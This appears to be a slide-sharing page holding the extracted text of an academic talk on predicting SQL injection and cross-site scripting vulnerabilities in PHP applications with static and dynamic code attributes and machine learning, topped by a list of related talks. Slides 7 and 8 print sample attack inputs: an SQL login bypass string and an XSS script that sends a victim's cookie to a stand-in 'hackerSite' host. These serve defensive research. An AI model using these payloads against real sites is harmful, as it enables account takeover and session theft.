Reinforcement Learning for Test Case Prioritization
Reinforcement Learning for Test Case PrioritizationReinforcement Learning for Test Case Prioritization
Reinforcement Learning for Test Case PrioritizationLionel Briand
 
Mutation Analysis for Cyber-Physical Systems: Scalable Solutions and Results ...
Mutation Analysis for Cyber-Physical Systems: Scalable Solutions and Results ...Mutation Analysis for Cyber-Physical Systems: Scalable Solutions and Results ...
Mutation Analysis for Cyber-Physical Systems: Scalable Solutions and Results ...Lionel Briand
 
On Systematically Building a Controlled Natural Language for Functional Requi...
On Systematically Building a Controlled Natural Language for Functional Requi...On Systematically Building a Controlled Natural Language for Functional Requi...
On Systematically Building a Controlled Natural Language for Functional Requi...Lionel Briand
 
Efficient Online Testing for DNN-Enabled Systems using Surrogate-Assisted and...
Efficient Online Testing for DNN-Enabled Systems using Surrogate-Assisted and...Efficient Online Testing for DNN-Enabled Systems using Surrogate-Assisted and...
Efficient Online Testing for DNN-Enabled Systems using Surrogate-Assisted and...Lionel Briand
 
Guidelines for Assessing the Accuracy of Log Message Template Identification ...
Guidelines for Assessing the Accuracy of Log Message Template Identification ...Guidelines for Assessing the Accuracy of Log Message Template Identification ...
Guidelines for Assessing the Accuracy of Log Message Template Identification ...Lionel Briand
 
A Theoretical Framework for Understanding the Relationship between Log Parsin...
A Theoretical Framework for Understanding the Relationship between Log Parsin...A Theoretical Framework for Understanding the Relationship between Log Parsin...
A Theoretical Framework for Understanding the Relationship between Log Parsin...Lionel Briand
 

Mais de Lionel Briand (20)

Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive Goal
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and Repair
 
Metamorphic Testing for Web System Security
Metamorphic Testing for Web System SecurityMetamorphic Testing for Web System Security
Metamorphic Testing for Web System Security
 
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...
 
Fuzzing for CPS Mutation Testing
Fuzzing for CPS Mutation TestingFuzzing for CPS Mutation Testing
Fuzzing for CPS Mutation Testing
 
Data-driven Mutation Analysis for Cyber-Physical Systems
Data-driven Mutation Analysis for Cyber-Physical SystemsData-driven Mutation Analysis for Cyber-Physical Systems
Data-driven Mutation Analysis for Cyber-Physical Systems
 
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled Systems
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled SystemsMany-Objective Reinforcement Learning for Online Testing of DNN-Enabled Systems
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled Systems
 
ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...
ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...
ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...
 
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...
 
PRINS: Scalable Model Inference for Component-based System Logs
PRINS: Scalable Model Inference for Component-based System LogsPRINS: Scalable Model Inference for Component-based System Logs
PRINS: Scalable Model Inference for Component-based System Logs
 
Revisiting the Notion of Diversity in Software Testing
Revisiting the Notion of Diversity in Software TestingRevisiting the Notion of Diversity in Software Testing
Revisiting the Notion of Diversity in Software Testing
 
Applications of Search-based Software Testing to Trustworthy Artificial Intel...
Applications of Search-based Software Testing to Trustworthy Artificial Intel...Applications of Search-based Software Testing to Trustworthy Artificial Intel...
Applications of Search-based Software Testing to Trustworthy Artificial Intel...
 
Autonomous Systems: How to Address the Dilemma between Autonomy and Safety
Autonomous Systems: How to Address the Dilemma between Autonomy and SafetyAutonomous Systems: How to Address the Dilemma between Autonomy and Safety
Autonomous Systems: How to Address the Dilemma between Autonomy and Safety
 
Mathematicians, Social Scientists, or Engineers? The Split Minds of Software ...
Mathematicians, Social Scientists, or Engineers? The Split Minds of Software ...Mathematicians, Social Scientists, or Engineers? The Split Minds of Software ...
Mathematicians, Social Scientists, or Engineers? The Split Minds of Software ...
 
Reinforcement Learning for Test Case Prioritization
Reinforcement Learning for Test Case PrioritizationReinforcement Learning for Test Case Prioritization
Reinforcement Learning for Test Case Prioritization
 
Mutation Analysis for Cyber-Physical Systems: Scalable Solutions and Results ...
Mutation Analysis for Cyber-Physical Systems: Scalable Solutions and Results ...Mutation Analysis for Cyber-Physical Systems: Scalable Solutions and Results ...
Mutation Analysis for Cyber-Physical Systems: Scalable Solutions and Results ...
 
On Systematically Building a Controlled Natural Language for Functional Requi...
On Systematically Building a Controlled Natural Language for Functional Requi...On Systematically Building a Controlled Natural Language for Functional Requi...
On Systematically Building a Controlled Natural Language for Functional Requi...
 
Efficient Online Testing for DNN-Enabled Systems using Surrogate-Assisted and...
Efficient Online Testing for DNN-Enabled Systems using Surrogate-Assisted and...Efficient Online Testing for DNN-Enabled Systems using Surrogate-Assisted and...
Efficient Online Testing for DNN-Enabled Systems using Surrogate-Assisted and...
 
Guidelines for Assessing the Accuracy of Log Message Template Identification ...
Guidelines for Assessing the Accuracy of Log Message Template Identification ...Guidelines for Assessing the Accuracy of Log Message Template Identification ...
Guidelines for Assessing the Accuracy of Log Message Template Identification ...
 
A Theoretical Framework for Understanding the Relationship between Log Parsin...
A Theoretical Framework for Understanding the Relationship between Log Parsin...A Theoretical Framework for Understanding the Relationship between Log Parsin...
A Theoretical Framework for Understanding the Relationship between Log Parsin...
 

Mining SQLi and XSS Vulnerabilities Using Hybrid Analysis

  • 1. Mining SQL Injection and Cross Site Scripting Vulnerabilities using Hybrid Program Analysis Shar Lwin Khin, Tan Hee Beng Kuan Information Engineering, Nanyang Technological University, Singapore   Lionel Briand, Interdisciplinary Centre for ICT Security, Reliability, and Trust, University of Luxembourg, Luxembourg   shar0035@e.ntu.edu.sg   ibktan@e.ntu.edu.sg     lionel.briand@uni.lu    
  • 2. Mo7va7on    Increasing  number  of  vulnerabili7es    Developers  lack  security  awareness    Manual  vulnerability  audit  is  effort  intensive  
  • 3. Related  Work Method   Granularity   Accuracy   Scalability   Vuln.  Predic7on   ×   √   √   Sta7c  taint  analysis   √     ×   √   Sta7c  &  dynamic  analysis   √   √   ×    ???   √   √   √  
  • 4. Problem  Defini7on  1/2  Input  valida,on  and  sani,za,on  are  two  common   defense  methods  used  in  web  applica7ons    Sta,c  a2ributes  have  been  shown  to  be  indicators  of   vulnerabili7es,  though  not  accurate  enough    Can  we  use  Sta7c  and  dynamic  aPributes  together   characterizing  the  implementa7ons  of  these  defense   methods  as  indicators?    Machine  learning  to  predict  vulnerability  based  on   aPributes  
  • 5. Problem  Defini7on  2/2  Typical  predic7on  models  are  classifica7on-­‐based    Being  supervised  learning,  their  effec7veness  is   dependent  on  the  availability  of  sufficient  training  data   tagged  with  class  labels    Cluster  analysis    (CA)  is  a  type  of  unsupervised  learning   methods    CA  may  be  used  if  vulnerable  instances  can  be   dis7nguished  from  non-­‐vulnerable  instances  based  on   the  proposed  aPributes  
  • 6. Vulnerability  Distribu7ons   © Web Hacking Incident Database
  • 7. SQL  Injec7on     7 Hacker login.php Database $name = ’ or 1=1 -- $q = “select * from user where name=‘’ or 1=1--’ and pw=‘’  Cause:  Inadequate  valida7on  and  sani7za7on   of  user  inputs  used  in  queries   $q = “select * from user where name=‘”.$name.“’ and pw=‘”.$pw.“’” Unauthorized user information SQLI!
  • 8. Cross  Site  Scrip7ng    Cause:  No  sanity  check  of  input  before  used   in  HTML  documents   Hacker Victim travelerTip.php Inject Script: <script>alert(xss!);</script> Visit http://travelingForum/travelerTip.php? Action=Post&Place=Greece&Tip=<Script>document.location=‘http://hackerSite/ stealCookie.jsp?cookie=’+document.cookie; </Script> Injected Script executed on victim’s browser XSS!
  • 9. Vulnerability  Predic7on  Principles    1/2    Using  hybrid  code  a2ributes  to  predict  vulnerabili7es    Based  on  both  sta7c  and  dynamic  program  analyses    Input  valida7on  checks  and  sani7za7on  opera7ons  mainly   based  on  string  opera,ons      e.g.,  preg_replace(“<script”, “”, $data)      Classify  the  types  of  string  opera7ons  applied  according   to  their  poten,al  effects  on  the  inputs  before  their  use  in   security-­‐sensi7ve  statements—sinks      e.g.,  echo $data; mysql_query($data)    Such  valida7on  checks  and  opera7ons  can  be  iden7fied   by  analyzing  data  dependence  graphs  
  • 10. Vulnerability  Predic7on  Principles    2/2    Given  the  data  dependence  graph  of  a  sink:     extrac,ng  the  number  of  inputs,  and  the  numbers  and   types  of  valida,on  and  sani,za,on  func,ons  from  the   graph,  can  we  predict  the  sink’s  vulnerability?          E.g.,  if  a  sink  uses  five  different  inputs,  there   should  at  least  be  five  input  valida7on  or   sani7za7on  func7ons.   sink
  • 11. Sta7c  and  Dynamic  Classifica7on    From  the  language  built-­‐in  func7ons  that  have  specific   security  purposes,  the  language  operators,  and  the   predefined  language  parameters  used,  a  node  is  classified   sta,cally.    e.g.,  addslashes($input), $_GET, $a = $b . $c  But  it  is  classified  dynamically  if  the  node  invokes  user-­‐ defined  func7ons  or  some  built-­‐in  func7ons  such  as  string   replacement.    e.g.,  $sanitized = preg_replace(“<+”, “”, $input)  The  func7on  code  is  executed  using  a  set  of  predefined  test   inputs,  and  the  final  values  of  test  input  variables  are   searched  for  malicious  characters.  
  • 12. Hybrid  Code  APributes   Attribute ID Attribute Name Description Static attributes 1 Client The number of nodes that access data from HTTP request parameters 2 File The number of nodes that access data from files 3 Database The number of nodes that access data from database 4 Text-database Boolean value ‘TRUE’ if there is any text-based data accessed from database; ‘FALSE’ otherwise 5 Other-database Boolean value ‘TRUE’ if there is any data except text-based data accessed from database; ‘FALSE’ otherwise 6 Session The number of nodes that access data from persistent data objects 7 Uninit The number of nodes that reference un-initialized program variable 8 SQLI-sanitization The number of nodes that apply standard sanitization functions for preventing SQLI issues 9 XSS-sanitization The number of nodes that apply standard sanitization functions for preventing XSS issues 10 Numeric-casting The number of nodes that type-cast data into a numeric type data 11 Numeric-type-check The number of nodes that perform numeric data type check 12 Encoding The number of nodes that encode data into a certain format 13 Un-taint The number of nodes that return predefined information or information not influenced by external users 14 Boolean The number of nodes which invoke functions that return Boolean value 15 Propagate The number of nodes that propagate partial or complete value of an input Dynamic attributes 16 Numeric The number of nodes which invoke functions that return only numeric, mathematic, or dash characters 17 LimitLength The number of nodes that invoke string-length limiting functions 18 URL The number of nodes that invoke path-filtering functions 19 EventHandler The number of nodes that invoke event-handler filtering functions 20 HTMLTag The number of nodes that invoke HTML-tag filtering functions 21 Delimiter The number of nodes that invoke delimiter filtering functions 22 AlternateEncode The number of nodes that invoke alternate-character-encoding filtering functions Target attribute 23 Vulnerable? Indicates a class label—Vulnerable or Not-Vulnerable
  • 13. Sample  APribute  Vectors   •  Each  sink  would  be  represented  by  a  23-­‐ dimensional  aPribute  vector.     •  Sample  aPribute  vectors  (Session,  XSS-­‐sanit,   Un-­‐taint,  Delimiter,  Propagate,…,   Vulnerable?):      (2,  4,  0,  0,  2,…,  Not-­‐Vulnerable)    (1,  0,  1,  1,  7,…,  Vulnerable)     13/50
  • 14. Supervised  Vulnerability  Predic7on    Data  Preprocessing    Normaliza7on    Principal  Component  Analysis    Classifiers    Logis7c  Regression  –regression  analysis    Mul7-­‐Layer  Perceptron  –neural  network  analysis    Training  &  Tes7ng  –10-­‐fold  cross  valida7on    
  • 15. Unsupervised  Vulnerability  Predic7on    Use  same  data  preprocessing  ac7vi7es  as   supervised  models    K-­‐means  cluster  analysis  based  on  two   assump7ons    non-­‐vulnerable  sinks  are  much  more  frequent  than   vulnerable  sinks    vulnerable  sinks  have  different  characteris7cs  from   non-­‐vulnerable  sinks    Label  clusters  as  Vulnerable  or  Non-­‐Vulnerable:    K=4:  Maximum  number  of  clusters    %Normal=12:  Minimum  size  of  non-­‐vulnerable   cluster  
  • 16. Case  Study    Six  open  source,  web  applica7ons  (PHP):      Known  vulnerable    Func7onali7es:  school  admin,  forum,  news,   content,  database  management    Sizes:  from  2k  –  44k  LOC      Vulnerability  iden7fica7on:  manual  &  vuln.   databases  –  Bugtraq,  CVE   16
  • 17. Prototype  Tool     Architecture of PhpMiner Weka
  • 18. Experiment  &  Result    1/2   Classification results of predictors built from hybrid attributes. LR performs better than MLP Maximum analysis time: 2 hours, average ½ hour AccuracyShin et al. TSE’113 achieved recall>80 and pf<25 Pixy S&P’061 reported pf>20. Too many false positives! Ardilla ICSE’094 reported up to 50% of paths left unexplored.... False negatives?  Our result recall=90, pf=5 Measure (%) à Data & Classifier recall false alarm precision schmate-html LR 99 3 98 MLP 99 0 100 faqforge-html LR 89 5 94 MLP 91 5 94 utopia-html LR 94 1 94 MLP 94 2 89 phorum-html LR 78 1 70 MLP 33 0 100 cutesite-html LR 68 9 61 MLP 78 8 67 myadmin-html LR 85 1 89 MLP 75 1 83 Average results on XSS prediction LR 86 3 84 MLP 78 3 89 schmate-sql LR 97 8 98 MLP 96 35 92 faqforge-sql LR 88 4 94 MLP 88 4 94 phorum-sql LR 100 3 63 MLP 0 1 0 cutesite-sql LR 91 14 89 MLP 89 18 86 Average results on SQLI prediction LR 94 7 86 MLP 68 15 68 Overall average LR 90 5 85 MLP 74 8 81
  • 19. Experiment  &  Result    2/2   Measure (%) Data recall false alarm precision utopia-html 100 13 65 phorum-html 56 11 16 cutesite-html 70 20 41 myadmin-html 55 8 33 phorum-sql 100 7 38 Average 76 12 39 k-means clustering analysis results on the datasets which have < 40% vulnerable sinks Measure (%) Data recall false alarm precision schmate-html 9 0 100 faqforge-html 26 0 100 schmate-sql 3 32 29 faqforge-sql 0 0 undefined cutesite-sql 0 0 undefined Average 8 6 undefined k-means clustering analysis results on the datasets which have ≥ 40% vulnerable sinks  When assumptions are not met, clustering does not work!
  • 20. Limita7ons    Supervised  learning  requires  sufficient  labeled   data  for  training    Unsupervised  learning  relies  on  some   assump7ons,  which  are  not  always  true:   Applicable  for  most  commercial  systems?    For  unsupervised  learning,  tuning  the  parameters   is  required:      K:  Maximum  number  of  clusters      %Normal:  Minimum  size  of  non-­‐vulnerable  cluster    
  • 21. Conclusion    Security  audi7ng  by  providing  probabilis7c  alerts  about   vulnerable  code  statements.      Propose  hybrid  (sta7c  and  Dynamic)  code  aPributes   for  vulnerability  predic,on  using  machine  learning    APributes  characterize  common  input  valida7on  and   sani7za7on  code  paPerns,  without  expensive  analysis    Scalability:  <  2  hours  on  a  regular  PC    Both  supervised  learning  and  unsupervised  learning   methods  were  used      Supervised  learning  accuracy:  90%  R,  85%  P    Unsupervised  learning:  Lower  accuracy,  applicability?  
  • 22. Future  Work    Semi-­‐supervised  learning      Combining  data  dependency  informa7on  with   control  dependency  informa7on      Address  other  types  of  similar  vulnerabili7es   by  considering  other  types  of  code  paPerns  
  • 23. The  End!   hPp://sharlwinkhin.com   23/50 Thank You! Question?
  • 24. References   1.  N.  Jovanovic,  C.  Kruegel,  and  E.  Kirda,  “Pixy:  a  sta7c  analysis  tool  for   detec7ng  web  applica7on  vulnerabili7es,”  in  IEEE  Symposium  on   Security  and  Privacy,  2006,  pp.  258-­‐263.   2.  D.  Balzarou  et  al.,  “Saner:  composing  sta7c  and  dynamic  analysis  to   validate  sani7za7on  in  web  applica7ons,”  in  IEEE  Symposium  on  Security   and  Privacy,  2008,  pp.  387-­‐401.     3.  Y.  Shin,  A.  Meneely,  L.  Williams,  and  J.  A.  Osborne,  “Evalua7ng   complexity,  code  churn,  and  developer  ac7vity  metrics  as  indicators  of   sowware  vulnerabili7es,”  IEEE  Transac7ons  on  Sowware  Engineering,  vol.   37  (6),  pp.  772-­‐787,  2011.   4.  Kieżun,  A.,  Guo,  P.  J.,  Jayaraman,  K.,  and  Ernst,  M.  D.  2009.  Automa7c   crea7on  of  SQL  injec7on  and  cross-­‐site  scrip7ng  aPacks.  In  Proceedings   of  the  31st  Interna,onal  Conference  on  SoTware  Engineering,   Vancouver,  BC,  pp.  199-­‐209.     5.  RSnake.  hPp://ha.ckers.org,  accessed  March  2012.   6.  I.  H.  WiPen  and  E.  Frank,  Data  Mining,  2nd  ed.,  Morgan  Kaufmann,  2005.     24